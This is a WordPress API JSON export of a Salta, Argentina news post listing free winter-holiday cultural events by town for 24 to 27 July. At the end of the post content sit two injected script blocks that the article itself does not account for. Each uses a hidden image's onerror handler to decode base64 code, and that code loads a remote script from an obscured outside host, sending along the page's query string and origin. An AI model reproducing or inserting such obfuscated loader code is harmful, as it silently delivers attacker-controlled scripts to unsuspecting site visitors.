{"id":5368,"date":"2025-07-24T21:34:35","date_gmt":"2025-07-25T00:34:35","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5368"},"modified":"2025-08-13T23:23:13","modified_gmt":"2025-08-14T02:23:13","slug":"salta-te-espera-con-actividades-para-disfrutar-este-fin-de-semana-de-invierno","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5368","title":{"rendered":"Salta te espera con actividades para disfrutar este fin de semana de invierno"},"content":{"rendered":"\n<p><strong><em>Desde hoy jueves 24 hasta el domingo 27 de julio, salte\u00f1os y turistas podr\u00e1n disfrutar de una variada agenda de actividades gratuitas y accesibles en distintos municipios. Incluye propuestas culturales, recreativas y tur\u00edsticas para toda la familia en estas vacaciones de invierno.<\/em><\/strong><\/p>\n\n\n\n<p>En estas vacaciones de invierno, Salta ofrece una agenda repleta de actividades tur\u00edsticas, culturales y recreativas en distintos municipios, para disfrutar en familia y con amigos. Desde hoy, jueves 24 y hasta el domingo 27 de julio, salte\u00f1os y visitantes podr\u00e1n ser parte de caminatas guiadas, festivales de folklore, ferias de emprendedores, visitas a museos y propuestas gastron\u00f3micas, entre otras opciones que enriquecen la experiencia de conocer la provincia.<\/p>\n\n\n\n<p>Con estas actividades, el&nbsp;<strong>Ministerio de Turismo y Deportes&nbsp;<\/strong>busca que cada persona que visite Salta pueda vivir su cultura, su naturaleza y su gente, generando encuentros en cada rinc\u00f3n de la provincia con propuestas que fortalecen la identidad salte\u00f1a y contribuyen a la actividad tur\u00edstica como generadora de empleo y desarrollo local. El calendario completo se puede consultar en https:\/\/calendar.turismosalta.gov.ar\/.<\/p>\n\n\n\n<p>A continuaci\u00f3n las actividades que se realizar\u00e1n en los distintos municipios desde el jueves 24 hasta el domingo 27 de julio. Los horarios se pueden consultar en los centros de visitantes de cada lugar.<\/p>\n\n\n\n<p><strong>El Galp\u00f3n<\/strong><br>\u2022&nbsp;&nbsp; &nbsp;Jueves 24 \u2013 Gran Festival en honor a San Francisco Solano. Cancha de la Liga Local.<br>\u2022&nbsp;&nbsp; &nbsp;Viernes 25 \u2013 Jineteada. Cancha de la liga local.<\/p>\n\n\n\n<p><strong>Payogasta<\/strong><br>\u2022&nbsp;&nbsp; &nbsp;Viernes 25 \u2013 Velada Fiesta del Pimiento. Anfiteatro La Pachamama.<br>\u2022&nbsp;&nbsp; &nbsp;S\u00e1bado 26 \u2013 52\u00ba edici\u00f3n de la Fiesta Provincial del Pimiento.&nbsp;<\/p>\n\n\n\n<p><strong>San Carlos<\/strong><br>\u2022&nbsp;&nbsp; &nbsp;Jueves 24 y Viernes 25 \u2013 San Carlos a puerta abiertas. Calle San Martin \u2013 RN\u00ba40<br>\u2022&nbsp;&nbsp; &nbsp;Domingo 27 \u2013 Fiesta Patronal en honor a San Santiago. Flia. Rodriguez \u2013 alle San Clte. De la Nueva Sevilla.&nbsp;<\/p>\n\n\n\n<p><strong>Cerrillos<\/strong><br>\u2022&nbsp;&nbsp; &nbsp;Jueves 24\u2013 Experiencia \u201cManos Cerrillanas\u201d y \u201cSimbando\u201d. Alojamientos de la localidad.<br>\u2022&nbsp;&nbsp; &nbsp;Domingo 27 \u2013 Feria en el Coraz\u00f3n de Salta. Plaza principal Serapio Gallegos. &nbsp;(sujeto a suspensi\u00f3n por condiciones clim\u00e1ticas)<\/p>\n\n\n\n<p><strong>Tartagal<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Domingo 27 \u2013 Kermesse de invierno. Plazoleta Ciriaco Benitez.<\/p>\n\n\n\n<p><strong>San Antonio de los Cobres<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Del Jueves 24 al Domingo 27 \u2013 Cine Cultural; Guiados especiales por las 9 salas del Museo Regional Andino; Muestra Itinerante de Aves de la Puna; Experiencia Tejido del \u201cPelero\u201d; Experiencia Thuru Maky; Paseo en Llamas; y Paseo al Sendero del Condor Mallku.<\/p>\n\n\n\n<p><strong>La Vi\u00f1a<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Del Viernes 25 al Domingo 27 \u2013 Espect\u00e1culos de m\u00fasica y danza folkl\u00f3rica; Actividades para la familia; Talleres de pinturas para ni\u00f1os; Cuentacuentos. Parador Las Abritas RN68, km 67.<\/p>\n\n\n\n<p><strong>Salta Ciudad<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Del Viernes 25 al Domingo 27 \u2013 Feria Plaza G\u00fcemes y Feria en Paseo de los Poetas.<br>\u00b7 &nbsp; &nbsp; &nbsp; S\u00e1bado 26 \u2013 Despidiendo las vacaciones en el Paseo de los Poetas.<br>\u00b7 &nbsp; &nbsp; &nbsp; Domingo 27 \u2013 Corsos de invierno de villa primavera. Tomas Cabrera y Usandivaras.<\/p>\n\n\n\n<p><strong>San Lorenzo<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Viernes 25 \u2013 Aprendiendo a bailar folclore y Taller para ni\u00f1os. Quebrada de San Lorenzo.<br>\u00b7 &nbsp; &nbsp; &nbsp; S\u00e1bado 26 y Domingo 27 \u2013 Feria de gastronom\u00eda El Zorzal. Plaza Ej\u00e9rcito Argentino.<\/p>\n\n\n\n<p><strong>Cachi<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Viernes 25 &#8211; XXIX Desfile de ropa artesanal. Sal\u00f3n Municipal.<br>\u00b7 &nbsp; &nbsp; &nbsp; S\u00e1bado 26 &#8211; XXVII Concurso de la comida vallista. Plaza Seca.<br>\u00b7 &nbsp; &nbsp; &nbsp; S\u00e1bado 26 y Domingo 27 \u2013 Feria de emprendedores, cocineros\/as y artesanos. Plaza Principal.<\/p>\n\n\n\n<p><strong>Cafayate<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Domingo 27 \u2013 35\u00ba Concierto de la monta\u00f1a. Anfiteatro en la Quebrada.<\/p>\n\n\n\n<p><strong>El Carril<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Domingo 27 &#8211; Feria gastron\u00f3mica y artesanal. Estaci\u00f3n Facundo de Zuvir\u00eda.<\/p>\n\n\n\n<p><strong>Rosario de la Frontera<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Domingo 27 &#8211; 3\u00aa jornada de Corsos de Invierno. Solar Gin\u00e9s Palaz\u00f3n.<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18559-salta-te-espera-con-actividades-para-disfrutar-este-fin-de-semana-de-invierno.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/18559-salta-te-espera-con-actividades-para-disfrutar-este-fin-de-semana-de-invierno.webp\" alt=\"Salta te espera con actividades para disfrutar este fin de semana de invierno\"\/><\/a><\/figure>\n\n\n\n<p><strong>Campo Quijano<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; Jueves 24 y Viernes 25 &#8211; enTRENtenerte en el Portal de los Andes. Estaci\u00f3n de Trenes Campo Quijano.<br>\u00b7 &nbsp; &nbsp; &nbsp; Domingo 27 &#8211; Paseo de Artesanos, ferias de productos locales y emprendedores. Plaza Martin Fierro.<\/p>\n\n\n\n<p><strong>Coronel Moldes<\/strong><br>\u00b7 &nbsp; &nbsp; &nbsp; S\u00e1bado 26 y Domingo 27 &#8211; Feria gastron\u00f3mica y artesanal; y Tarde Matera. Plaza Principal.<\/p>\n\n\n\n<p><strong>El Jard\u00edn<\/strong><br>\u00b7&nbsp; &nbsp; &nbsp; &nbsp;S\u00e1bado 26 &#8211; Caminata al Sunchal. Paraje El Espinal<br>&#8211;&nbsp; &nbsp; &nbsp; &nbsp;Paseo a caballos a Las Galer\u00edas. RP N\u00b0 6 \u00abSendero gaucho\u00bb.<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Desde hoy jueves 24 hasta el domingo 27 de julio, salte\u00f1os y turistas podr\u00e1n disfrutar de una variada agenda de actividades gratuitas y accesibles en distintos municipios. Incluye propuestas culturales, recreativas y tur\u00edsticas para toda la familia en estas vacaciones de invierno. En estas vacaciones de invierno, Salta ofrece una agenda repleta de actividades tur\u00edsticas, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5369,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[15,17],"tags":[],"class_list":{"0":"post-5368","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-provincial","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5368"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5368"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5368\/revisions"}],"predecessor-version":[{"id":6430,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5368\/revisions\/6430"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5369"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5368"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5368"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5368"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}